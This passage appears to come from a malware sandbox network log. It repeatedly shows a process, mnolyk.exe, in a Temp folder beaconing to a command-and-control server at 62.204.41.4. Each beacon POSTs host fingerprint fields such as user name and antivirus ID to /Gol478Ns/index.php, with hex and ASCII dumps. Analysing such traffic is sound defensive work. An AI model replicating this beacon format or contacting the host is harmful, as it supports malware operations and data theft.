                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.995294094 CET | 564 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    365 | 192.168.2.3 | 50068 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:06.167681932 CET | 565 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:06.233010054 CET | 565 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    366 | 192.168.2.3 | 50069 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:06.449832916 CET | 566 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:06.514261007 CET | 566 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    367 | 192.168.2.3 | 50070 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:06.689347982 CET | 567 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:06.753258944 CET | 567 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    368 | 192.168.2.3 | 50071 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:06.945888042 CET | 568 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.008430958 CET | 568 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    369 | 192.168.2.3 | 50072 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:07.195107937 CET | 569 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.262188911 CET | 569 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    37 | 192.168.2.3 | 49739 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:25.862579107 CET | 238 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.926588058 CET | 238 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    370 | 192.168.2.3 | 50073 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:07.436064959 CET | 570 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.504116058 CET | 570 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    371 | 192.168.2.3 | 50074 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:07.684649944 CET | 571 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.747404099 CET | 571 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    372 | 192.168.2.3 | 50075 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:07.920020103 CET | 572 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.983623028 CET | 572 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    373 | 192.168.2.3 | 50076 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:08.154937029 CET | 573 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.217927933 CET | 573 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    374 | 192.168.2.3 | 50077 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:08.402072906 CET | 574 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.466217995 CET | 574 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    375 | 192.168.2.3 | 50078 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:08.649501085 CET | 575 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.713500977 CET | 575 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    376 | 192.168.2.3 | 50079 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:08.887763977 CET | 576 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.950818062 CET | 576 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    377 | 192.168.2.3 | 50080 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:09.144078970 CET | 577 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.207382917 CET | 577 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    378 | 192.168.2.3 | 50081 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:09.395226955 CET | 578 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.459316969 CET | 578 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    379 | 192.168.2.3 | 50082 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:09.638220072 CET | 579 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.703239918 CET | 579 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    38 | 192.168.2.3 | 49740 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:26.105437040 CET | 239 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:26.169698000 CET | 239 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    380 | 192.168.2.3 | 50083 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:09.880270004 CET | 580 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.943525076 CET | 580 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    381 | 192.168.2.3 | 50084 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
